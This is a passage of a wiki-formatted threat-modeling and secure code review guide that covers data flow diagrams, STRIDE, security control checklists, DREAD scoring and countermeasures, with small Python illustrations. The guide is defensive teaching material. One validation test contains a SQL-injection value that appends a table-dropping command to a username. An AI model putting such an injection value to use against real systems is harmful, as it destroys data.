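        self.nodes = {}   # element name mapped to its element type
        self.flows = []   # (source, destination, data) directed triples

    def add_node(self, name, element_type):
        assert element_type in ELEMENT_TYPES
        self.nodes[name] = element_type

    def add_flow(self, src, dst, data):
        # The arrow of the data flow points from src to dst.
        self.flows.append((src, dst, data))

dfd = DFD()
dfd.add_node("User", "external_entity")
dfd.add_node("Login Process", "process")
dfd.add_node("College Library Database", "data_store")
dfd.add_flow("User", "Login Process", "login credentials")
dfd.add_flow("Login Process", "College Library Database", "credential lookup")
```

Data stores appear only as flow endpoints, consistent with the rule that they store data but do not modify it.&lt;br /&gt;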
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Example===&lt;br /&gt;
&amp;lt;br/&amp;gt; '''Data Flow Diagram for the College Library Website'''&lt;br /&gt;
&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
[[Image:Data flow1.jpg]]&lt;br /&gt;
&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
'''User Login Data Flow Diagram for the College Library Website'''&lt;br /&gt;
&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
[[Image:Data flow2.jpg]]&lt;br /&gt;
&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Determine and Rank Threats ==&lt;br /&gt;
===Threat Categorization===&lt;br /&gt;
The first step in the determination of threats is adopting a threat categorization. A threat categorization provides a set of threat categories with corresponding examples so that threats can be systematically identified in the application in a structured and repeatable manner. &lt;br /&gt;
&lt;br /&gt;
====STRIDE====&lt;br /&gt;
A threat categorization such as STRIDE is useful in the identification of threats by classifying attacker goals such as:&lt;br /&gt;
*Spoofing&lt;br /&gt;
*Tampering&lt;br /&gt;
*Repudiation&lt;br /&gt;
*Information Disclosure&lt;br /&gt;
*Denial of Service&lt;br /&gt;
*Elevation of Privilege&lt;br /&gt;
&lt;br /&gt;
A threat list of generic threats organized in these categories with examples and the affected security controls is provided in the following table:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;table align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;1&amp;quot; CELLPADDING=&amp;quot;7&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th colspan=&amp;quot;4&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;STRIDE Threat List&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Type&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Examples&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Security Control&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Spoofing&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Threat action aimed to illegally access and use another user's credentials, such as username and password.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Authentication&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Tampering&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Threat action aimed to maliciously change/modify persistent data, such as persistent data in a database, and the alteration of data in transit between two computers over an open network, such as the Internet.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Integrity&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Repudiation&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Threat action aimed to perform illegal operations in a system that lacks the ability to trace the prohibited operations.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Non-Repudiation&amp;lt;/td&amp;gt; &lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Information disclosure&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Threat action to read a file that one was not granted access to, or to read data in transit. &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Confidentiality&amp;lt;/td&amp;gt; &lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Denial of service&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Threat aimed to deny access to valid users, such as by making a web server temporarily unavailable or unusable. &lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Availability&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Elevation of privilege&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Threat aimed to gain privileged access to resources for gaining unauthorized access to information or to compromise a system.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Authorization&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
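The category-to-control mapping in the STRIDE table lends itself to a simple lookup; a minimal sketch:&lt;br /&gt;

```python
# The STRIDE-to-control mapping from the table above, as a lookup.
STRIDE = {
    "Spoofing": "Authentication",
    "Tampering": "Integrity",
    "Repudiation": "Non-Repudiation",
    "Information Disclosure": "Confidentiality",
    "Denial of Service": "Availability",
    "Elevation of Privilege": "Authorization",
}

def control_for(threat_category):
    # Returns the security control that counters the given threat category.
    return STRIDE[threat_category]

assert control_for("Spoofing") == "Authentication"
```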
&lt;br /&gt;
==Security Controls==&lt;br /&gt;
Once the basic threat agents and business impacts are understood, the review team should try to identify the set of controls that could prevent these threat agents from causing those impacts.  The primary focus of the code review should be to ensure that these security controls are in place, that they work properly, and that they are correctly invoked in all the necessary places. The checklist below can help to ensure that all the likely risks have been considered.&lt;br /&gt;
&lt;br /&gt;
'''Authentication:'''&lt;br /&gt;
*Ensure all internal and external connections (user and entity) go through an appropriate and adequate form of authentication. Be assured that this control cannot be bypassed. &lt;br /&gt;
*Ensure all pages enforce the requirement for authentication. &lt;br /&gt;
*Ensure that whenever authentication credentials or any other sensitive information is passed, the application accepts the information only via the HTTP “POST” method and rejects it via the HTTP “GET” method. &lt;br /&gt;
*Any page deemed by the business or the development team as being outside the scope of authentication should be reviewed in order to assess any possibility of security breach. &lt;br /&gt;
*Ensure that authentication credentials do not traverse the wire in clear text form. &lt;br /&gt;
*Ensure development/debug backdoors are not present in production code. &lt;br /&gt;
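As an illustration of the POST-only rule above, a framework-agnostic sketch (the handler and parameter names are hypothetical):&lt;br /&gt;

```python
# Hypothetical login handler illustrating the POST-only rule for credentials.
def handle_login(method, params):
    if method != "POST":
        # Credentials in a GET query string leak into logs, browser
        # history, and Referer headers, so the request is refused.
        return {"status": 405, "error": "use POST"}
    if not params.get("username") or not params.get("password"):
        return {"status": 400, "error": "missing credentials"}
    return {"status": 200}

assert handle_login("GET", {"username": "a", "password": "b"})["status"] == 405
assert handle_login("POST", {"username": "a", "password": "b"})["status"] == 200
```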
&lt;br /&gt;
'''Authorization: '''&lt;br /&gt;
*Ensure that there are authorization mechanisms in place. &lt;br /&gt;
*Ensure that the application has clearly defined the user types and the rights of said users. &lt;br /&gt;
*Ensure there is a least privilege stance in operation. &lt;br /&gt;
*Ensure that the Authorization mechanisms work properly, fail securely, and cannot be circumvented. &lt;br /&gt;
*Ensure that authorization is checked on every request. &lt;br /&gt;
*Ensure development/debug backdoors are not present in production code. &lt;br /&gt;
&lt;br /&gt;
'''Cookie Management: '''&lt;br /&gt;
*Ensure that sensitive information is not compromised. &lt;br /&gt;
*Ensure that unauthorized activities cannot take place via cookie manipulation. &lt;br /&gt;
*Ensure that proper encryption is in use. &lt;br /&gt;
*Ensure the secure flag is set to prevent accidental transmission over “the wire” in a non-secure manner. &lt;br /&gt;
*Determine if all state transitions in the application code properly check for the cookies and enforce their use. &lt;br /&gt;
*Ensure the session data is being validated. &lt;br /&gt;
*Ensure cookies contain as little private information as possible. &lt;br /&gt;
*Ensure entire cookie is encrypted if sensitive data is persisted in the cookie. &lt;br /&gt;
*Define all cookies being used by the application, their name, and why they are needed. &lt;br /&gt;
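A sketch of a session cookie carrying the attributes the checklist calls for; the helper name is hypothetical and real frameworks expose equivalent options:&lt;br /&gt;

```python
# Hypothetical helper emitting a session cookie with the recommended flags.
def session_cookie_header(session_id):
    attrs = [
        "session=" + session_id,
        "Secure",            # only ever sent over TLS, never in the clear
        "HttpOnly",          # not readable from client-side script
        "SameSite=Strict",   # not attached to cross-site requests
        "Path=/",
    ]
    return "Set-Cookie: " + "; ".join(attrs)

header = session_cookie_header("opaque-random-id")
assert "Secure" in header
assert "HttpOnly" in header
```

Note the cookie value is an opaque identifier: the session data itself stays server side, keeping private information out of the cookie.&lt;br /&gt;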
&lt;br /&gt;
'''Data/Input Validation: '''&lt;br /&gt;
*Ensure that a data validation (DV) mechanism is present. &lt;br /&gt;
*Ensure all input that can (and will) be modified by a malicious user, such as HTTP headers, input fields, hidden fields, drop-down lists, and other web components, is properly validated. &lt;br /&gt;
*Ensure that the proper length checks on all input exist. &lt;br /&gt;
*Ensure that all fields, cookies, http headers/bodies, and form fields are validated. &lt;br /&gt;
*Ensure that the data is well formed and contains only known good characters if possible. &lt;br /&gt;
*Ensure that the data validation occurs on the server side. &lt;br /&gt;
*Examine where data validation occurs and if a centralized model or decentralized model is used. &lt;br /&gt;
*Ensure there are no backdoors in the data validation model. &lt;br /&gt;
*'''Golden Rule: All external input, no matter what it is, is examined and validated. '''&lt;br /&gt;
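A minimal sketch of centralized, server-side validation that allowlists known good characters and enforces length limits; the field names and rules are hypothetical:&lt;br /&gt;

```python
# Centralized validation model: every field has an allowlist rule, and
# unknown fields are rejected outright (names here are hypothetical).
import re

RULES = {
    "username": re.compile(r"[A-Za-z0-9_]{3,32}"),
    "book_id":  re.compile(r"[0-9]{1,10}"),
}

def validate(field, value):
    rule = RULES.get(field)
    if rule is None:
        return False   # unknown fields are rejected, not passed through
    # fullmatch enforces both the character allowlist and the length bounds.
    return rule.fullmatch(value) is not None

assert validate("username", "kirsten_s")
assert not validate("username", "k; DROP TABLE users")
```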
&lt;br /&gt;
'''Error Handling/Information leakage: '''&lt;br /&gt;
*Ensure that all method/function calls that return a value have proper error handling and return value checking. &lt;br /&gt;
*Ensure that exceptions and error conditions are properly handled. &lt;br /&gt;
*Ensure that no system errors can be returned to the user. &lt;br /&gt;
*Ensure that the application fails in a secure manner. &lt;br /&gt;
*Ensure resources are released if an error occurs. &lt;br /&gt;
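A sketch of failing in a secure manner: low-level details are logged server side while the user receives only a generic message (the lookup and logger wiring are hypothetical):&lt;br /&gt;

```python
# Catch low-level errors, log the detail, return only a generic message.
import logging

log = logging.getLogger("app")

def fetch_record(db, record_id):
    try:
        return {"ok": True, "data": db[record_id]}
    except Exception as exc:
        # Detail goes to the server log, never to the client.
        log.error("lookup failed for id=%r: %s", record_id, exc)
        # Fail securely: no stack trace or system error reaches the user.
        return {"ok": False, "error": "request could not be completed"}

result = fetch_record({}, 42)
assert result["ok"] is False
assert "Traceback" not in result["error"]
```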
&lt;br /&gt;
'''Logging/Auditing: '''&lt;br /&gt;
*Ensure that no sensitive information is logged in the event of an error. &lt;br /&gt;
*Ensure the payload being logged is of a defined maximum length and that the logging mechanism enforces that length. &lt;br /&gt;
*Ensure no sensitive data can be logged; e.g. cookies, HTTP “GET” method, authentication credentials. &lt;br /&gt;
*Examine if the application will audit the actions being taken by the application on behalf of the client (particularly data manipulation/Create, Update, Delete (CUD) operations). &lt;br /&gt;
*Ensure successful and unsuccessful authentication is logged. &lt;br /&gt;
*Ensure application errors are logged. &lt;br /&gt;
*Examine the application for debug logging with the view to logging of sensitive data. &lt;br /&gt;
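A sketch of enforcing a maximum logged-payload length and redacting sensitive keys before logging; the limit and key names are illustrative choices:&lt;br /&gt;

```python
# Sanitize a payload before it reaches the logging mechanism.
MAX_PAYLOAD = 256
SENSITIVE = {"password", "cookie", "authorization"}

def loggable(payload):
    safe = {}
    for key, value in payload.items():
        if key.lower() in SENSITIVE:
            safe[key] = "[REDACTED]"          # never log credentials or cookies
        else:
            safe[key] = str(value)[:MAX_PAYLOAD]   # enforce the maximum length
    return safe

entry = loggable({"username": "ks", "password": "secret", "note": "x" * 1000})
assert entry["password"] == "[REDACTED]"
assert len(entry["note"]) == MAX_PAYLOAD
```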
&lt;br /&gt;
'''Cryptography: '''&lt;br /&gt;
*Ensure no sensitive data is transmitted in the clear, internally or externally. &lt;br /&gt;
*Ensure the application is implementing known good cryptographic methods. &lt;br /&gt;
&lt;br /&gt;
'''Secure Code Environment: '''&lt;br /&gt;
*Examine the file structure. Are any components that should not be directly accessible available to the user?&lt;br /&gt;
*Examine all memory allocations/de-allocations. &lt;br /&gt;
*Examine the application for dynamic SQL and determine if it is vulnerable to injection. &lt;br /&gt;
*Examine the application for “main()” executable functions and debug harnesses/backdoors. &lt;br /&gt;
*Search for commented-out code and commented-out test code, which may contain sensitive information. &lt;br /&gt;
*Ensure all logical decisions have a default clause. &lt;br /&gt;
*Ensure no development environment kit is contained on the build directories. &lt;br /&gt;
*Search for any calls to the underlying operating system or file open calls and examine the error possibilities. &lt;br /&gt;
&lt;br /&gt;
'''Session Management: '''&lt;br /&gt;
*Examine how and when a session is created for a user, unauthenticated and authenticated. &lt;br /&gt;
*Examine the session ID and verify if it is complex enough to fulfill requirements regarding strength. &lt;br /&gt;
*Examine how sessions are stored: e.g. in a database, in memory etc. &lt;br /&gt;
*Examine how the application tracks sessions. &lt;br /&gt;
*Determine the actions the application takes if an invalid session ID occurs. &lt;br /&gt;
*Examine session invalidation. &lt;br /&gt;
*Determine how multithreaded/multi-user session management is performed. &lt;br /&gt;
*Determine the session HTTP inactivity timeout. &lt;br /&gt;
*Determine how the log-out functionality works.&lt;br /&gt;
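For the session ID strength check above, a sketch of generating an identifier with sufficient entropy using the standard library; the 32-byte size is an illustrative assumption, not a requirement from the guide:

```python
import secrets

SESSION_ID_BYTES = 32  # 256 bits of entropy from a CSPRNG

def new_session_id():
    """Generate an unguessable, URL-safe session identifier."""
    return secrets.token_urlsafe(SESSION_ID_BYTES)
```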
&lt;br /&gt;
==Threat Analysis==&lt;br /&gt;
The prerequisite in the analysis of threats is the understanding of the generic definition of risk, that is, the probability that a threat agent will exploit a vulnerability to cause an impact to the application. From the perspective of risk management, threat modeling is the systematic and strategic approach for identifying and enumerating threats to an application environment with the objective of minimizing risk and the associated impacts. &lt;br /&gt;
&lt;br /&gt;
Threat analysis as such is the identification of the threats to the application, and involves the analysis of each aspect of the application's functionality, architecture, and design to identify and classify potential weaknesses that could lead to an exploit. &lt;br /&gt;
&lt;br /&gt;
In the first threat modeling step, we have modeled the system showing data flows, trust boundaries, process components, and entry and exit points. An example of such modeling is shown in the Example: Data Flow Diagram for the College Library Website. &lt;br /&gt;
&lt;br /&gt;
Data flows show how data moves logically through the system end to end, and allow the identification of affected components through critical points (i.e. data entering or leaving the system, storage of data) and the flow of control through these components. Trust boundaries show any location where the level of trust changes. Process components show where data is processed, such as web servers, application servers, and database servers. Entry points show where data enters the system (i.e. input fields, methods) and exit points are where it leaves the system (i.e. dynamic output, methods), respectively. Entry and exit points define a trust boundary. &lt;br /&gt;
&lt;br /&gt;
Threat lists based on the STRIDE model are useful in the identification of threats with regards to the attacker goals. For example, if the threat scenario is attacking the login, would the attacker brute force the password to break the authentication? If the threat scenario is to try to elevate privileges to gain another user’s privileges, would the attacker try to perform forceful browsing? &lt;br /&gt;
&lt;br /&gt;
It is vital that all possible attack vectors are evaluated from the attacker’s point of view. For this reason, it is also important to consider entry and exit points, since they could also allow the realization of certain kinds of threats. For example, the login page allows sending authentication credentials, and the input data accepted by an entry point has to be validated for potentially malicious input that exploits vulnerabilities such as SQL injection, cross site scripting, and buffer overflows. Additionally, the data flow passing through that point has to be used to determine the threats to the entry points of the next components along the flow. If the following components can be regarded as critical (e.g. they hold sensitive data), that entry point can be regarded as more critical as well. In an end to end data flow, for example, the input data (i.e. username and password) from a login page, passed on without validation, could be exploited for a SQL injection attack to manipulate a query for breaking the authentication or to modify a table in the database. &lt;br /&gt;
&lt;br /&gt;
Exit points might serve as attack points to the client (e.g. XSS vulnerabilities) as well as for the realization of information disclosure vulnerabilities. For example, in the case of exit points from components handling confidential data (e.g. data access components), exit points lacking security controls to protect confidentiality and integrity can lead to disclosure of such confidential information to an unauthorized user. &lt;br /&gt;
&lt;br /&gt;
In many cases threats enabled by exit points are related to the threats of the corresponding entry point. In the login example, error messages returned to the user via the exit point might allow for entry point attacks, such as account harvesting (e.g. username not found), or SQL injection (e.g. SQL exception errors). &lt;br /&gt;
&lt;br /&gt;
From the defensive perspective, the identification of threats driven by a security control categorization such as ASF allows a threat analyst to focus on specific issues related to weaknesses (e.g. vulnerabilities) in security controls. Typically the process of threat identification involves going through iterative cycles where initially all the possible threats in the threat list that apply to each component are evaluated. &lt;br /&gt;
&lt;br /&gt;
At the next iteration, threats are further analyzed by exploring the attack paths, the root causes (e.g. vulnerabilities, depicted as orange blocks) for the threat to be exploited, and the necessary mitigation controls (e.g. countermeasures, depicted as green blocks). A threat tree, as shown in figure 2, is useful for performing such threat analysis. &lt;br /&gt;
&lt;br /&gt;
[[Image:Threat_Graph.gif|Figure 2: Threat Graph]]&lt;br /&gt;
&lt;br /&gt;
Once common threats, vulnerabilities, and attacks are assessed, a more focused threat analysis should take into consideration use and abuse cases. By thoroughly analyzing the use scenarios, weaknesses can be identified that could lead to the realization of a threat. Abuse cases should be identified as part of the security requirement engineering activity. These abuse cases can illustrate how existing protective measures could be bypassed, or where a lack of such protection exists. A use and misuse case graph for authentication is shown in figure below:&lt;br /&gt;
&lt;br /&gt;
[[Image:UseAndMisuseCase.jpg|Figure 3: Use and Misuse Case]]&lt;br /&gt;
&lt;br /&gt;
Finally, it is possible to bring all of this together by determining the types of threat to each component of the decomposed system. This can be done by using a threat categorization such as STRIDE or ASF, the use of threat trees to determine how the threat can be exposed by a vulnerability, and use and misuse cases to further validate the lack of a countermeasure to mitigate the threat.&lt;br /&gt;
&lt;br /&gt;
To apply STRIDE to the data flow diagram items the following table can be used: &lt;br /&gt;
&lt;br /&gt;
TABLE&lt;br /&gt;
&lt;br /&gt;
==Ranking of Threats==&lt;br /&gt;
Threats can be ranked from the perspective of risk factors. By determining the risk factor posed by the various identified threats, it is possible to create a prioritized list of threats to support a risk mitigation strategy, such as deciding on which threats have to be mitigated first. Different risk factors can be used to determine which threats can be ranked as High, Medium, or Low risk. In general, threat risk models use different factors to model risks such as those shown in figure below:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Image:Riskfactors.JPG|Figure 4: Risk Model Factors]]&lt;br /&gt;
&lt;br /&gt;
==DREAD==&lt;br /&gt;
In the Microsoft DREAD threat-risk ranking model, the technical risk factors for impact are Damage and Affected Users, while the ease of exploitation factors are Reproducibility, Exploitability and Discoverability. This risk factorization allows the assignment of values to the different influencing factors of a threat. To determine the ranking of a threat, the threat analyst has to answer basic questions for each factor of risk, for example: &lt;br /&gt;
&lt;br /&gt;
*For Damage: How big can the damage be?&lt;br /&gt;
*For Reproducibility: How easy is it to reproduce the attack?&lt;br /&gt;
*For Exploitability: How much time, effort, and expertise is needed to exploit the threat?&lt;br /&gt;
*For Affected Users: If a threat were exploited, what percentage of users would be affected?&lt;br /&gt;
*For Discoverability: How easy is it for an attacker to discover this threat?&lt;br /&gt;
&lt;br /&gt;
By referring to the college library website, it is possible to document sample threats related to the use cases, such as: &lt;br /&gt;
&lt;br /&gt;
'''Threat: Malicious user views confidential information of students, faculty members and librarians.'''&lt;br /&gt;
# '''Damage potential:''' Threat to reputation as well as financial and legal liability:8&lt;br /&gt;
# '''Reproducibility:'''  Fully reproducible:10&lt;br /&gt;
# '''Exploitability:'''   Requires being on the same subnet or having compromised a router:7&lt;br /&gt;
# '''Affected users:'''   Affects all users:10&lt;br /&gt;
# '''Discoverability:'''  Can be found out easily:10&lt;br /&gt;
&lt;br /&gt;
Overall DREAD score: (8+10+7+10+10) / 5 = 9&lt;br /&gt;
&lt;br /&gt;
In this case, a score of 9 on a 10-point scale certainly marks this as a high-risk threat.&lt;br /&gt;
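The arithmetic above generalizes to any threat: a sketch computing the DREAD score as the mean of the five factors, using the college library example's ratings:

```python
def dread_score(damage, reproducibility, exploitability, affected, discoverability):
    """Average the five DREAD factors (each rated 0-10)."""
    factors = (damage, reproducibility, exploitability, affected, discoverability)
    return sum(factors) / len(factors)

# College library example: (8 + 10 + 7 + 10 + 10) / 5 = 9
score = dread_score(8, 10, 7, 10, 10)
```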
&lt;br /&gt;
==Generic Risk Model==&lt;br /&gt;
A more generic risk model takes into consideration the Likelihood (e.g. probability of an attack) and the Impact (e.g. damage potential): &lt;br /&gt;
&lt;br /&gt;
'''Risk = Likelihood x Impact'''&lt;br /&gt;
&lt;br /&gt;
The likelihood or probability is defined by the ease of exploitation, which mainly depends on the type of threat and the system characteristics, and by the possibility of realizing the threat, which is determined by whether an appropriate countermeasure exists.  &lt;br /&gt;
&lt;br /&gt;
The following is a set of considerations for determining ease of exploitation: &lt;br /&gt;
# Can an attacker exploit this remotely? &lt;br /&gt;
# Does the attacker need to be authenticated?&lt;br /&gt;
# Can the exploit be automated?&lt;br /&gt;
&lt;br /&gt;
The impact mainly depends on the damage potential and the extent of the impact, such as the number of components that are affected by a threat. &lt;br /&gt;
&lt;br /&gt;
Examples to determine the damage potential are:&lt;br /&gt;
# Can an attacker completely take over and manipulate the system?  &lt;br /&gt;
# Can an attacker gain administration access to the system?&lt;br /&gt;
# Can an attacker crash the system? &lt;br /&gt;
# Can the attacker obtain access to sensitive information such as secrets or PII?&lt;br /&gt;
&lt;br /&gt;
Examples to determine the number of components that are affected by a threat:&lt;br /&gt;
# How many data sources and systems can be impacted?&lt;br /&gt;
# How “deep” into the infrastructure can the threat agent go?&lt;br /&gt;
&lt;br /&gt;
These examples help in the calculation of the overall risk values by assigning qualitative values such as High, Medium, and Low to the Likelihood and Impact factors. In this case, using qualitative values rather than numeric ones, as in the DREAD model, helps avoid the ranking becoming overly subjective.&lt;br /&gt;
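A sketch of the qualitative Risk = Likelihood x Impact ranking described above; the particular cell assignments in this matrix are a common convention, not something mandated by the guide:

```python
LEVELS = {"Low": 0, "Medium": 1, "High": 2}

def qualitative_risk(likelihood, impact):
    """Combine qualitative Likelihood and Impact into a risk rating."""
    score = LEVELS[likelihood] + LEVELS[impact]
    if score >= 3:
        return "High"    # e.g. High x Medium, High x High
    if score == 2:
        return "Medium"  # e.g. Medium x Medium, High x Low
    return "Low"
```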
&lt;br /&gt;
==Countermeasure Identification==&lt;br /&gt;
The purpose of the countermeasure identification is to determine if there is some kind of protective measure (e.g. security control, policy measures) in place that can prevent each threat previously identified via threat analysis from being realized. Vulnerabilities are then those threats that have no countermeasures. Since each of these threats has been categorized either with STRIDE or ASF, it is possible to find appropriate countermeasures in the application within the given category. &lt;br /&gt;
&lt;br /&gt;
Provided below is a brief checklist, by no means exhaustive, for identifying countermeasures for specific threats. &lt;br /&gt;
 &lt;br /&gt;
Example of countermeasures for ASF threat types are included in the following table: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;table align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;1&amp;quot; CELLPADDING=&amp;quot;7&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th colspan=&amp;quot;4&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;ASF Threat &amp;amp; Countermeasures List&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Threat Type&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Countermeasure&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Authentication&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Credentials and authentication tokens are protected with encryption in storage and transit&lt;br /&gt;
#Protocols are resistant to brute force, dictionary, and replay attacks&lt;br /&gt;
#Strong password policies are enforced&lt;br /&gt;
#Trusted server authentication is used instead of SQL authentication&lt;br /&gt;
#Passwords are stored with salted hashes&lt;br /&gt;
#Password resets do not reveal password hints and valid usernames&lt;br /&gt;
#Account lockouts do not result in a denial of service attack&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Authorization&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Strong ACLs are used for enforcing authorized access to resources&lt;br /&gt;
#Role-based access controls are used to restrict access to specific operations&lt;br /&gt;
#The system follows the principle of least privilege for user and service accounts&lt;br /&gt;
#Privilege separation is correctly configured within the presentation, business and data access layers&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Configuration Management&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Least privileged processes are used and service accounts with no administration capability&lt;br /&gt;
#Auditing and logging of all administration activities is enabled&lt;br /&gt;
#Access to configuration files and administrator interfaces is restricted to administrators&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Data Protection in Storage and Transit&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Standard encryption algorithms and correct key sizes are being used&lt;br /&gt;
#Hashed message authentication codes (HMACs) are used to protect data integrity&lt;br /&gt;
#Secrets (e.g. keys, confidential data ) are cryptographically protected both in transport and in storage&lt;br /&gt;
#Built-in secure storage is used for protecting keys&lt;br /&gt;
#No credentials and sensitive data are sent in clear text over the wire&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Data Validation / Parameter Validation&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Data type, format, length, and range checks are enforced&lt;br /&gt;
#All data sent from the client is validated&lt;br /&gt;
#No security decision is based upon parameters (e.g. URL parameters) that can be manipulated&lt;br /&gt;
#Input filtering via white list validation is used&lt;br /&gt;
#Output encoding is used&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Error Handling and Exception Management&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#All exceptions are handled in a structured manner&lt;br /&gt;
#Privileges are restored to the appropriate level in case of errors and exceptions&lt;br /&gt;
#Error messages are scrubbed so that no sensitive information is revealed to the attacker&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;User and Session Management&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#No sensitive information is stored in clear text in the cookie&lt;br /&gt;
#The contents of the authentication cookies are encrypted&lt;br /&gt;
